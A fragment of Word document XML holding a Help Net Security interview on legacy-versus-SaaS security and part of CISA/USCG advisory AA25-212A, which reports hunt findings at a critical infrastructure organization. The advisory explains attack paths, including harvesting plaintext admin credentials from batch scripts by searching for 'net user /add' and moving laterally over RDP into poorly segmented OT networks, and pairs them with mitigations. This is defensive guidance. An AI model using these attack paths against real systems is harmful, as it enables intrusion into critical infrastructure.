          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>From legacy to SaaS: Why complexity is the enemy of enterprise security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this Help Net Security interview, Robert Buljevic, Technology Consultant at Bridge IT, discusses how the coexistence of legacy systems and SaaS applications is changing the way organizations approach security. He explains why finding the right balance between old and new technology is essential for maintaining protection.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 more companies move from traditional on-prem setups to SaaS, how is that changing the way they approach security? Are most organizations handling that shift well, or are they struggling?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Most organizations are dealing with a messy reality: legacy systems combined with SaaS applications. The latter are often driven by business process owners, i.e. departmental leads or "power users": business needs now dictate the speed and create demand for ever more applications and technology solutions. In the past, it was IT dictating the pace of innovation. Nowadays, the IT staff is often caught on the back foot, struggling to support the business while maintaining the legacy or "core" systems.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These pressures only add to the complexity and operational challenges. And as we know, complexity is the enemy of security: when resources are limited and IT environments become more complicated, the risk of human error, or even simple oversight, leading to a security incident increases significantly.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outcome is often a sense of being stuck somewhere in between, with costs pressures mounting and attention being diverted to a "thousand" priorities, widening the security gaps.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Add to that the "sunk cost fallacy", an entirely self-inflicted IT issue, especially during technology transitions. IT departments continue investing in outdated or inefficient systems simply because they've already spent a lot of money, time, or resources on them, even when switching to a setup would be smarter. You might hear something like "We spent millions building our data center. We can't just move everything to the cloud now." Yet continuing to pour resources into maintaining a legacy system can cost more long-term, while supporting evolving business needs and productivity is increasingly difficult within that setup. Other sunk cost fallacy symptoms include clinging to custom-built internal tools and renewing legacy software licenses for what is in reality underused and expensive enterprise software.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Finally, organizations face external pressures as threat actors' efforts are centered around two main areas: first, social engineering targeting employees lacking strong multifactor authentication. Second, they focus on on-premises infrastructure by weaponizing wormable vulnerabilities (no user interaction required) in systems exposed on the internet, including next- gen firewalls, VPN gateways and remote access tools, or self-hosted public- facing applications in general (think of the recent Sharepoint on-prem vulnerability), or the myriad of vulnerabilities affecting firewall and VPN vendors.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security budgets are still somewhat misaligned with these trends. Money is being spent on addressing network and endpoint detection and response capabilities. While detecting intruders is important, it fails to recognize the factors which make intruders succeed in first place: and key predictors of success for attackers are self hosted infrastructure and relying on weak or phishable authentication (passwords only). ZTNA is often cited as a best practice. Why is it so difficult to apply ZTNA principles in traditional enterprise environments, and what alternatives are feasible in the short term?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Here were I work (Central and Eastern European region), it's safe to bet most organizations' core infrastructure is based on three key on-prem technologies: Microsoft Active Directory (AD) for authenticating and managing networked assets; a VPN and firewall for remote access into the organization network; and some kind of self-managed IaaS, usually based on VMware. Of course, this is an extremely simplified outline, but it holds true across a wide variety of organizations.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mix of technologies is actually something threat actors have been specializing in breaching: from automating discovery, to infiltration and privilege escalation, aided by wormable vulnerabilities and weak authentication. In fact, ransomware operators thrive on these systems, and you will hardly find a successful breach where some of all of the mentioned on-prem technologies are not involved.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Start with Active Directory network: securing it and applying ZTNA principles is exceedingly difficult, as the architecture offers countless lateral movement opportunities within the network, with little or no MFA. Once attackers are inside the network perimeter, persistence is easy and a variety of living-off-the-land techniques are available for them.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Then consider VPN and remote access scenarios: these are not easy to upgrade or modernize, so hardly any includes device posture and user identity checks before allowing granular access to an application, all key ingredients of ZTNA. Also, on-prem self-managed VPN/firewall appliances are under unprecedented scrutiny by threat actors: firewall vendors are being extensively researched for vulnerabilities by well-funded threat actor groups, often backed by nation-states (for example Sophos has offered a candid report). These groups develop exploits and initiate threat campaigns to compromise as many devices as possible, well before the vendor becomes aware of the exploitation, let alone patches are provided.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ZTNA vendors will try to address all those gaps around traditional enterprise systems, but the whole implementation becomes much more costlier and complicated, a true example of bolt-on security, rather than a secure- by-design system.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modernizing, i.e., moving applications to a more SaaS-like consumption model, the network perimeter and associated on-prem complexity tends to dissipate, which is actually a good thing, as it makes ZTNA easier to implement. As the main entry point into an organization's IT system becomes the web application URL (and browser), this reduces attackers' opportunities and forces them to focus on the identity layer, subverting authentication, phishing, etc.</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Of course, a higher degree of trust has to be placed (and tolerated) in SaaS providers, but at least we now have clear guidance on what to look for when transitioning to SaaS and cloud: identity protection, MFA, and phishing-resistant authentication mechanisms become critical-and these are often enforced by default or at least much easier to implement compared to traditional systems.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As an example, see the British Library (BL) report on the ransomware attack they suffered in late 2023: BL indicates how their on-prem technology made it harder to implement MFA, which was identified as a key contributor to attackers' success. BL is also using cloud-based systems, apparently Microsoft 365 and also applications for finance and payroll functions, and these "have functioned normally throughout the incident", protected by the MFA-enabled cloud identity provider. Finally, BL staff concludes: "We expect the balance between cloud-based and onsite technologies to shift substantially towards the former in the next 18 months, which will come with its own risks that need to be actively managed, even as we substantially reduce security and other risks by making this change."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There's little to add to that. With a willingness to move to SaaS, I believe the organization is much better positioned in terms of ZTNA principles implementation and overall security risk profile. In your experience, what are the most common mistakes organizations make when transitioning from legacy to SaaS or cloud-native models, particularly from a security standpoint?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sunk cost fallacy I mentioned earlier is perhaps the most common mistake. Being overly invested into existing technologies (yes, even emotionally) creates an unwillingness to move and modernize. In larger organizations, one has to include politics as well: there are powerful "constituencies" or lobbies pushing for a particular technology stack.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our region, this is certainly a preference for the on-prem technology mix discussed above: Active Directory, self managed Windows and Linux servers running on an internal IaaS platform such as VMware, VPN and even remote desktop (RDP) access. It is also the stack preferred by ransomware operators and other threat actors, as it offers so much more opportunities to infiltrate and persist within an IT environment.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unwillingness to simplify technology stack by moving to SaaS is then combined with a reluctant and forced move to the cloud for some applications, usually dictated by business priorities or even ransomware attacks (as in the BL case above). This is a toxic mix which increases complexity and reduces the ability for a resource-constrained organization to keep security risks at bay.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Another mistake is not fully recognizing the human factor, as attackers are forced to focus on subverting employee identity to infiltrate. Recall how strong authentication becomes all important when moving to SaaS and cloud. It also means security awareness, i.e. employee preparedness and capacity to recognize novel phishing and scam attempts, becomes more important.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 infrastructure is simplified, the most advanced cyberattacks aren't necessarily those that exploit particular technical vulnerabilities, they target people. Industry reports such as Verizon's Data Breach Investigation Report consistently find the vast majority of breaches are caused by the human element: stolen credentials or phishing.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underscores the importance of placing emphasis on continuous security awareness training and identity security within the IT security budget. We've seen uneven adoption of cloud services across the EU. In what ways does this lag create a wider attack surface or increase exposure to threats like ransomware or data exfiltration?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Indeed, official Eurostat data on cloud computing usage by enterprises confirms more developed EU countries are also more avid cloud adopters, in contrast with eastern and south EU member states, which lag behind.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 suspect this reflects cultural differences, where a more pervasive lack of trust within the economy and society in general prevents more change and innovation, including transitions to the cloud. It is true SaaS implies more reliance on vendors, including delegating more trust to a 3rd party. But increasing levels of trust underlie the division of labor and specialization, which are required for productivity growth and a thriving economy.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are also more immediate security implications here: I've mentioned earlier how threat actors thrive on existing on-prem and self-managed infrastructure, used precisely where organizations are more cloud averse. The opportunities for attackers there are more plentiful, so the incentives to attack are stronger.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SaaS service providers are not perfect nor they guarantee security. But there is a difference in terms of attack surface exposure when using a solution consumed as SaaS vs consumed the traditional way (i.e. self- installed software from the same vendor). In case when the vendor is providing the SaaS service, any security issue directly and simultaneously impacts its service for all customers and therefore has a more immediate consequence on revenue and reputation - so the incentive to secure is much stronger (no wonder SaaS providers are more interested in MFA strong authentication adoption).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Contrast that with software packaged to be implemented on customer side the traditional way: here most of the responsibility is on the customer side, including patching, securing the setup, monitoring for intrusions, etc. while the incentive to secure is much more diluted.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Also, on-prem installed software does not provide the vendor timely information when threat actors discover and weaponize a new zero-day vulnerability. For the vendor, this means slower detection and telemetry feedback, followed by research and development of security patches, which then require more time for distribution to all the customers and finally installation. So it's no wonder we sometimes see months elapse from vulnerability being widely exploited in the wild to being patched by a majority of customers.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case of SaaS, this feedback loop is much shorter and immediate, which is especially important now that threat actors increasingly focus on zero-day vulnerabilities, especially in internet facing services such as VPN devices and web applications.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earlier mentioned Data Breach Investigation Report for 2025 confirms this trend. The authors notice a significant rise in the exploitation of vulnerabilities as an initial access vector for breaches during last year: "This was an increase of 34% in relation to last year's report and was supported, in part, by zeroday exploits targeting edge devices and VPNs."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It's worth stressing all these exploitations keep occurring on self-managed software or devices on customer premises (as opposed to equivalent SaaS offerings by the same vendors); the vulnerabilities are exploited days or weeks before being noticed by vendors, let alone a patch released; and it usually takes months for patches to be installed by customers (if ever).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Finally, these events require costly security professional services for cleanup and assurance that attackers have not infiltrated the network prior to patching (as a recent example of this dynamics, see the recent Sharepoint on-prem vulnerability). How can CISOs in mid-sized or resource- constrained organizations balance the need to modernize with the need to secure high-risk legacy systems in the interim?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Although it might not be a case of "low hanging fruit" or "quick wins", there are some areas where focus can yield significant improvement.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First, tackle email, office productivity and collaboration software - this is the part most often first migrated to a SaaS consumption model and there shouldn't really be a reason for running and maintaining those on-prem. The migration tooling here is widely available and knowledge on how to migrate is quite common among implementation partners.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Second, reduce VPN and remote access usage by exposing key applications via solutions such as SASE and managed remote access offerings. This will reduce the need for self-managed VPNs and remote connectivity, also reducing entry points for attackers, and most importantly, more or less automatically increase MFA adoption.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Going further, you should rethink your identity infrastructure (most likely based on Active Directory), by decoupling and later switching to a cloud identity provider, which will make it more easier to pervasively support MFA across the entire application estate.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Ask yourself, what business apps can be consumed as SaaS and do your market research. Any new business needs should be handled by consuming SaaS applications. As outlined earlier, a key evaluation criteria here should be whether the application supports MFA, ideally the phishing resistant kind.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all this in mind, the time and resources required to manage and maintain the IT environment will remain manageable. In fact, this approach allows for more focused attention on the legacy infrastructure as well, including its security.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Help Net Security 2025.08.11 08:48</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.helpnetsecurity.com/2025/08/11/robert-buljevic-bridge-it-legacy-saas-security/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>CISA and USCG Identify Areas for Cyber Hygiene Improvement After Conducting Proactive Threat Hunt at US Critical Infrastructure Organization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Release Date July 31, 2025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Alert Code AA25-212A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Cybersecurity Best Practices, Organizations and Cyber Safety, Critical Infrastructure Security and Resilience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Summary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Cybersecurity and Infrastructure Security Agency (CISA) and U.S. Coast Guard (USCG) are issuing this Cybersecurity Advisory to present findings from a recent CISA and USCG hunt engagement. The purpose of this advisory is to highlight identified cybersecurity issues, thereby informing security defenders in other organizations of potential similar issues and encouraging them to take proactive measures to enhance their cybersecurity posture. This advisory has been coordinated with the organization involved in the hunt engagement.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2024, CISA led a proactive hunt engagement at a U.S. critical infrastructure organization with the support of USCG analysts. During hunts, CISA proactively searches for evidence of malicious activity or malicious cyber actor presence on customer networks. The organization invited CISA to conduct a proactive hunt to determine if an actor had been present in the organization's environment. (Note: Henceforth, unless otherwise defined, "CISA" is used in this advisory to refer to the hunt team as an umbrella for both CISA and USCG analysts).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During this engagement, CISA did not identify evidence of malicious cyber activity or actor presence on the organization's network, but did identify cybersecurity risks, including: Insufficient logging; Insecurely stored credentials; Shared local administrator (admin) credentials across many workstations; Unrestricted remote access for local admin accounts; Insufficient network segmentation configuration between IT and operational technology (OT) assets; and Several device misconfigurations.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In coordination with the organization where the hunt was conducted, CISA and USCG are sharing cybersecurity risk findings and associated mitigations to assist other critical infrastructure organizations with improving their cybersecurity posture. Recommendations are listed for each of CISA's findings, as well as general practices to strengthen cybersecurity for OT environments. These mitigations align with CISA and the National Institute for Standards and Technology's (NIST) Cross-Sector Cybersecurity Performance Goals (CPGs), and with mitigations </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>provided in the USCG Cyber Command's (CGCYBER) 2024 Cyber Trends and Insights in the Marine Environment (CTIME) Report.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Although no malicious activity was identified during this engagement, critical infrastructure organizations are advised to review and implement the mitigations listed in this advisory to prevent potential compromises and better protect our national infrastructure. These mitigations include the following (listed in order of importance): Do not store passwords or credentials in plaintext. Instead, use secure password and credential management solutions such as encrypted password vaults, managed service accounts, or built-in secure features of deployment tools.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure that all credentials are encrypted both at rest and in transit. Implement strict access controls and regular audits to securely manage scripts or tools accessing credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use code reviews and automated scanning tools to detect and eliminate any instances of plaintext credentials on hosts or workstations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enforce the principle of least privilege, only granting users and processes the access necessary to perform their functions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Avoid sharing local administrator account credentials. Instead, provision unique, complex passwords for each account using tools like Microsoft's Local Administrator Password Solution (LAPS) that automate password management and rotation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enforce multifactor authentication (MFA) for all administrative access, including local and domain accounts, and for remote access methods such as Remote Desktop Protocol (RDP) and virtual private network (VPN) connections. Implement and enforce strict policies to only use hardened bastion hosts isolated from IT networks equipped with phishing-resistant MFA to access industrial control systems (ICS)/OT networks, and ensure regular workstations (i.e., workstations used for accessing IT networks and applications) cannot be used to access ICS/OT networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement comprehensive (i.e., large coverage) and detailed logging across all systems, including workstations, servers, network devices, and security appliances.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure logs capture information such as authentication attempts, command- line executions with arguments, and network connections.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Retain logs for an appropriate period to enable thorough historical analysis (adhering to organizational policies and compliance requirements) and aggregate logs in an out-of-band, centralized location, such as a security information event management (SIEM) tool, to protect them from tampering and facilitate efficient analysis.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more detailed mitigations addressing the identified cybersecurity risks, see the Mitigations section of this advisory. Technical Details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Note: This advisory uses the MITRE ATT&amp;CK(R) Matrix for Enterprise framework, version 17. See Appendix: MITRE ATT&amp;CK Tactics and Techniques for a table of potential activity mapped to MITRE ATT&amp;CK tactics and techniques. Overview</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Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard (USCG) analysts (collectively referred to as CISA in this report) conducted a threat hunt engagement at a critical infrastructure organization in 2024. During this hunt, CISA proactively searched for evidence of malicious activity or the presence of a malicious cyber actor on the customer's network using host, network, industrial control system (ICS), and commercial cloud and open-source analysis tools. CISA searched for evidence of activity by looking for specific exploitation tactics, techniques, and procedures (TTPs) and associated artifacts.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CISA did not find evidence of threat actor presence on the organization's network, the team did identify several cybersecurity risks. These findings are listed below in order of risk. Technical details of each identified cyber risk are included, along with the potential impact from threat actor exploitation of each risk (recommendations for mitigating each risk are listed in the Mitigations section below).</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Several of these findings align with those observed during similar engagements conducted by US Coast Guard Cyber Command (CGCYBER), which are documented in their 2024 Cyber Trends and Insights in the Marine Environment (CTIME) report. The authoring agencies encourage critical infrastructure organizations to review the CTIME report to understand trends in the techniques/attack paths threat actors are using to compromise at-risk organizations, and what mitigations organizations should implement to prevent a successful attack. Key Findings Shared Local Admin Accounts with Non-Unique Passwords Stored as Plaintext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Details: CISA identified a few local admin accounts with non-unique passwords; these accounts were shared across many hosts. The credentials for each account were stored plaintext in batch scripts. CISA discovered these authorized scripts were configured to create user accounts with local admin privileges and then set identical, non-expiring passwords-these passwords were stored in plaintext in the script. One script was configured to create an admin account (set with a password stored in the script in plaintext) and automatically add to the admin group. The account was set as the local admin account on many other hosts.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Potential Impact: The storage of local admin credentials in plaintext scripts across numerous hosts increases the risk of widespread unauthorized access, and the usage of non-unique passwords facilitates lateral movement throughout the network. Malicious actors with access to workstations with either of these batch scripts could obtain the passwords for these local admin accounts by searching the filesystem for strings like net user /add, identifying scripts containing usernames and passwords [T1552.001], and accessing these accounts to move laterally.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For example, during a controlled security validation exercise (with explicit permission from the customer), CISA used the credentials found in one of the scripts to log into its associated admin account locally on a workstation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[T1078.003], and then establish a Remote Desktop Protocol (RDP) connection to another workstation [T1021.001]. This demonstrated that the credentials allowed local login to an admin account and enabled lateral movement to any workstation with the account. While using this account, the user had local admin privileges on many workstations. Upon initiating the RDP session, the system issued out a notification that another user was currently logged in and that continuing the session would disconnect the existing user, confirming that the account can be accessed remotely via RDP.</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uniform use of local admin accounts with identical, non-expiring passwords across numerous hosts, coupled with the storage of these credentials in plaintext within accessible scripts, elevates the risk of unauthorized access and lateral movement throughout the network.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local admin access, malicious cyber actors can: Modify existing accounts or create new accounts [T1098], potentially escalating privileges or maintaining persistent access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Install malicious browser extensions on compromised systems [T1112]. Communicate with compromised systems using standard application layer protocols [T1071], which may bypass certain security monitoring tools. Modify local policies to escalate privileges or disable security features [T1484].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Alter system configurations or install software that executes at startup [T1547], ensuring continued access and persistence.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Hijack the execution flow of applications to inject malicious code [T1574].</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widespread distribution of plaintext credentials and the use of identical passwords across hosts increases the risk of unauthorized access throughout the network. This vulnerability heightens the potential for attackers to conduct unauthorized activities, which may impact the confidentiality, integrity, and availability of the organization's assets.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Note: This finding was associated with workstations only; servers and other devices were not affected. Insufficient Network Segmentation Configuration Between IT and Operational Technology Environments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Details: While assessing interconnectivity between the customer's IT and operational technology (OT) environments, CISA identified that the OT environment was not properly configured. Specifically, standard user accounts could directly access the supervisory control and data acquisition (SCADA) virtual local area network (VLAN) directly from IT hosts.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First, CISA determined it was possible to establish a connection via port 21 from a user workstation in the IT network to a system within the SCADA VLAN. The test established that a network path was available, the remote host was reachable, the port was open and listening for connections, and that the port was directly accessible between the IT and SCADA VLANs, with misconfigured network-level restrictions-for example, firewalls or access control lists (ACLs)-blocking the Transmission Control Protocol (TCP) connection on the port. This test was conducted using a standard user account on a regular IT workstation without administrative privileges [T1078].</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Second, CISA discovered that the customer did not have sufficient secured bastion hosts dedicated for accessing SCADA and heating, ventilation, and air conditioning (HVAC) systems. A bastion host--sometimes referred to as a jump box or jump server-is a specialized, highly secured system (often a server or dedicated workstation) that serves as the sole access point between a network segment (such as an internal IT network) and a protected internal network (like an OT or ICS environment). By inspecting and filtering all inbound and outbound traffic, a bastion host is designed to prevent unauthorized access and lateral movement, ensuring that only authenticated and authorized users can interact with internal systems. Though several hosts were designated as bastion hosts for remote access to SCADA and HVAC systems, they lacked the enhanced security configuration, dedicated monitoring, and specialized scrutiny expected of bastion hosts.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Potential Impact: Insufficient OT network segmentation configuration, network access control (NAC), and the ability of a non-privileged user within the IT network to use their credentials to access the critical SCADA VLAN [T1078] presents a security and safety risk. Given that SCADA and HVAC systems control physical processes, compromises of these systems can have real-world consequences, including risks to personnel safety, infrastructure integrity, and equipment functionality.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Malicious actors could further exploit potentially unsecured workstations with access to OT systems, and insufficient network segmentation configuration between IT and OT systems, in the following ways: Use RDP or Secure Shell (SSH) protocols to move laterally from compromised IT workstations to OT systems [T1021.001] [T1021.004].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Execute commands and scripts using scripting languages like PowerShell to attack OT systems [T1059].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Map network connections to identify paths to OT systems [T1049].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Gather information about network configurations to plan attacks on OT systems [T1016].</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exploiting these weaknesses, attackers can potentially gain unauthorized access to critical OT systems, manipulate physical processes, disrupt operations, and cause harm. Insufficient Log Retention and Implementation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Details: CISA was unable to hunt for every MITRE ATT&amp;CK(R) procedure in the scoped hunt plan partly because the organization's event logging system was insufficient for this analysis. For example, Windows event logs from workstations were not being forwarded to the organization's security information event management (SIEM), verbose command line auditing was not enabled (meaning command line arguments were not being captured in Event ID 4688), logging in the SIEM was not as comprehensive as required for the analysis, and log retention did not allow for a thorough analysis of historical activity.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Potential Impact: The absence of comprehensive and detailed logs, along with a lack of an established baseline for normal network behavior, prevented CISA from performing thorough behavior and anomaly-based detection. This </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>limitation hindered the ability to hunt for certain TTPs, such as living-off-the-land techniques, the use of valid accounts [T1078], and other TTPs used by sophisticated threat actors. Such techniques often do not produce discrete indicators of compromise or trigger alerts from antivirus software, intrusion detection systems (IDS), or endpoint detection and response (EDR) solutions. Further, the lack of workstation logs in the organization's SIEM meant CISA could not analyze authentication events to identify anomalous activities, such as unauthorized access using local administrator credentials. This gap exposes networks to undetected lateral movement and unauthorized access.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Insufficient logging can prevent the detection of malicious activity by hindering investigations, which makes detection of threat actors more challenging and leaves the network susceptible to undetected threats. Additional Findings Misconfigured sslFlags on a Production Server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Details: CISA used PowerShell to examine the ApplicationHost.config file[1]- a central configuration file for Internet Information Services (IIS) that governs the behavior of the web server and its applications and websites-on a production IIS server. CISA observed an HTTPS binding configured with sslFlags=="0", which keeps IIS in its legacy "one-certificate-per-IP" mode. This mode disables modern certificate-management features, and because mutual Transport Layer Security (TLS) (client-certificate authentication) must be enabled separately in "SSL Settings" or by adding &lt;access sslFlags="Ssl, SslRequireCert" /&gt;, the binding leaves the client- certificate enforcement off by default, allowing any TLS client to complete the handshake anonymously. Moreover, sslFlags does not control protocol or cipher selection, so outdated protocols or weak cipher suites (e.g., SSL 3.0, TLS 1.0/1.1) may still be accepted unless Secure Channel (Schannel)[2] has been explicitly hardened.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Potential Impact: The misconfigured sslFlags could enable threat actors to attempt an adversary-in-the-middle attack [T1557] to intercept credentials and data transmitted between clients and the IIS server. Malicious actors could also exploit vulnerabilities in older Secure Sockets Layer (SSL)/TLS protocols, as well as weak cipher suites, increasing the risk for protocol downgrade attacks in which an attacker forces the server and client to negotiate the use of weaker encryption standards [T1562.010]. This compromises the confidentiality and integrity of data transmitted over this channel. Furthermore, the absence of client certificate enforcement meant the server did not validate the identity of the connecting clients beyond the basic SSL/TLS handshake. This deficiency exposed the server to risks where unauthorized or malicious clients could impersonate legitimate users, potentially gaining access to sensitive resources without proper verification. Misconfigured Structured Query Language Connections on a Production Server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Details: CISA reviewed machine.config file on a production server and identified that it was configured with a centralized database connection string, LocalSqlServer, for both profile and role providers. This configuration implies that, unless overridden in each application's web.config files, every ASP.NET site on the server connects to the same Structured Query Language (SQL) Express or aspnetdb database and shares the same credentials context.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Additionally, CISA identified that the machine.config file set the minRequiredPasswordLength to be less than 15 characters, which is CISA's recommended password length.</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Potential Impact: Using a centralized database approach increases risk, as a single breach or misconfiguration in this central SQL database server can compromise all applications dependent on the server. This creates a single point of failure and could be exploited by attackers aiming to gain broad access to the system.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Additionally, setting the minimum password length to any password under 15 characters is more vulnerable to various forms of brute-force attacks, such as password guessing [T1110.001], cracking [T1110.002], spraying [T1110.003], and credential stuffing [T1110.004]. If a threat actor successfully cracked these weak passwords, they could gain unauthorized access to user or application accounts and leverage vulnerabilities within applications to further escalate privileges, potentially leading to unauthorized access to the backend SQL Server databases. This could result in data breaches, data manipulation, or a loss of database integrity. Mitigations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CISA and USCG recommend that critical infrastructure organizations implement the mitigations below to improve their organization's cybersecurity posture. Recommendations to reduce cyber risk are listed for each of CISA's findings during this engagement and are ordered starting from the highest to lowest importance for organizations to implement. CISA and USCG also include general practices to strengthen cybersecurity for OT environments that are not tied to specific findings.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These mitigations align with the Cross-Sector Cybersecurity Performance Goals jointly developed by CISA and the National Institute for Standards and Technology (NIST). The Cybersecurity Performance Goals (CPGs) provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful TTPs. Visit CISA's CPGs webpage for more information.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Many of these mitigations also align with recommendations made by CGCYBER in their 2024 CTIME report. The report provides relevant information and lessons learned about cybersecurity risks gathered through operations similar to this threat hunt engagement, and best practices to mitigate these risks. Please see the 2024 CTIME report for additional recommendations for critical infrastructure organizations to implement to harden their environments against malicious activity. Implement Unique Credentials and Access Control Measures for Administrator Accounts Provision unique and complex credentials for local administrator accounts [CPG 2.C] on all systems. Do not use shared or identical administrative credentials across systems. Ensure service accounts/machine accounts have passwords unique from all member user accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
